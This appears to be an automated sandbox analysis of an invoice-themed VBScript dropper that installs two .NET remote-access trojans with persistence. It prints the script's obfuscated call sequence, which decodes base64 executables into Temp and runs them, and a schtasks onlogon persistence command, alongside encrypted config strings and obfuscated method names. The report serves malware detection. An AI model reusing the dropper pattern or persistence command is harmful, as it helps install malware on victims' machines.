Source: ame.exe.1.dr, Client/Settings.cs Base64 encoded string: 'zRlbkDV/H4IQoBSWA+od+Fo7vFBH6XGjYAE8lUUM1EgdgQ/dxZntjT1mcc5I8leIvIPIn+elqTA+hEinIzR/IA==', '/VvVX34V9tWm+vKyVZ9H+jroY9Sy/aAHhfTNJjSdeNrF3Fgc5YawIQW6zbZ5ubwiFr/xRkrp76tOkFGjHJZKOL2fo7aWPeRn4i7nueeakB8=', 'OrWq9hO36kOLoaNhl6j14kwqg/h20q8S7Yayyw9+JcoIZqzmQ6M3PdcQj7JMXoRgpsRUgE8UjS2jWrhKEZhCHErXU0RvwYoxBJMYsT7cQmY=', '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', 'guaOpPvLUuTY1lGiMRcMdLKZx2lI+Z0hP1IEWzhfwOExZiFB7mJpRsbJNVbckUa6w/E7gsxM7nJ91FblGT+06XKUW1Zt8fn+EmcpaLTPFOHa71dd/dkgw4iKFll6uK0fEpjZKhw90nAvt7q7xo/Sn8kNd6Q0qObHLuFuVK8soCYl5X0s4Khla/FB4I+wTl53FnTbGqpBLjW3Fo28IFGoCdJxJ94Mom2WT2996GM3npHKsbmwtpDdlNfeiVucvSjXrwHp1p+vLXcyA+66jp0v5DBxnmiMHDZPPTLX81sNEZkQgdEAKfTn0Y0edIG6aaHTeEPdAkVioYo
Source: Notepads.exe.3.dr, Client/Settings.cs Base64 encoded string: 'zRlbkDV/H4IQoBSWA+od+Fo7vFBH6XGjYAE8lUUM1EgdgQ/dxZntjT1mcc5I8leIvIPIn+elqTA+hEinIzR/IA==', '/VvVX34V9tWm+vKyVZ9H+jroY9Sy/aAHhfTNJjSdeNrF3Fgc5YawIQW6zbZ5ubwiFr/xRkrp76tOkFGjHJZKOL2fo7aWPeRn4i7nueeakB8=', 'OrWq9hO36kOLoaNhl6j14kwqg/h20q8S7Yayyw9+JcoIZqzmQ6M3PdcQj7JMXoRgpsRUgE8UjS2jWrhKEZhCHErXU0RvwYoxBJMYsT7cQmY=', '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', 'guaOpPvLUuTY1lGiMRcMdLKZx2lI+Z0hP1IEWzhfwOExZiFB7mJpRsbJNVbckUa6w/E7gsxM7nJ91FblGT+06XKUW1Zt8fn+EmcpaLTPFOHa71dd/dkgw4iKFll6uK0fEpjZKhw90nAvt7q7xo/Sn8kNd6Q0qObHLuFuVK8soCYl5X0s4Khla/FB4I+wTl53FnTbGqpBLjW3Fo28IFGoCdJxJ94Mom2WT2996GM3npHKsbmwtpDdlNfeiVucvSjXrwHp1p+vLXcyA+66jp0v5DBxnmiMHDZPPTLX81sNEZkQgdEAKfTn0Y0edIG6aaHTeEPdAkVioYo
Source: 3.2.ame.exe.500000.0.unpack, Client/Settings.cs Base64 encoded string
Source: 3.0.ame.exe.500000.0.unpack, Client/Settings.cs Base64 encoded string
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Settings.cs Base64 encoded string
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Settings.cs Base64 encoded string
Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ame.exe.1.dr, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: ame.exe.1.dr, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Notepads.exe.3.dr, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Notepads.exe.3.dr, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@14/9@20/3
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023410DA AdjustTokenPrivileges, 4_2_023410DA
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023410A3 AdjustTokenPrivileges, 4_2_023410A3
Source: C:\Users\user\AppData\Local\Temp\fi.exe File created: C:\Program Files (x86)\DHCP Monitor
Source: C:\Users\user\AppData\Local\Temp\ame.exe File created: C:\Users\user\AppData\Roaming\Notepads.exe
Source: C:\Users\user\AppData\Roaming\Notepads.exe Mutant created: \Sessions\1\BaseNamedObjects\871-085a33d91457
Source: C:\Users\user\AppData\Local\Temp\fi.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{ac555290-50d4-4120-9390-e76e4f948dd7}
Source: C:\Users\user\AppData\Local\Temp\fi.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ame.exe
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
Source: C:\Users\user\AppData\Local\Temp\ame.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Notepads.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\Notepads.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Invoice No F1019855_PDF.vbs Virustotal: Detection: 29%
Source: Invoice No F1019855_PDF.vbs ReversingLabs: Detection: 23%
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Notepads.exe C:\Users\user\AppData\Roaming\Notepads.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\ame.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALKNKPEAAAAAAAAAAOAAIgALATAAANIBAAAIAAAAAAAA7vE");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ame.exe", "2");IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKEn6VQAAAAAAAAAAOAADgELAQYAAMgBAABgAQAAAAAAkuc");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\fi.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\ame.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\fi.exe")
.NET source code contains potential unpacker
Source: ame.exe.1.dr, Client/Handle_Packet/HandlerRecovery.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeUSB.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ame.exe.1.dr, Client/Handle_Packet/HandleSendTo.cs .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleSendTo.cs .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeUSB.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandlerRecovery.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Binary contains a suspicious time stamp
Source: ame.exe.1.dr Static PE information: 0xF1288DB2 [Tue Mar 18 07:39:30 2098 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E5BA1 push E87220CAh; ret 4_2_022E5C26
Source: dhcpmon.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: dhcpmon.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
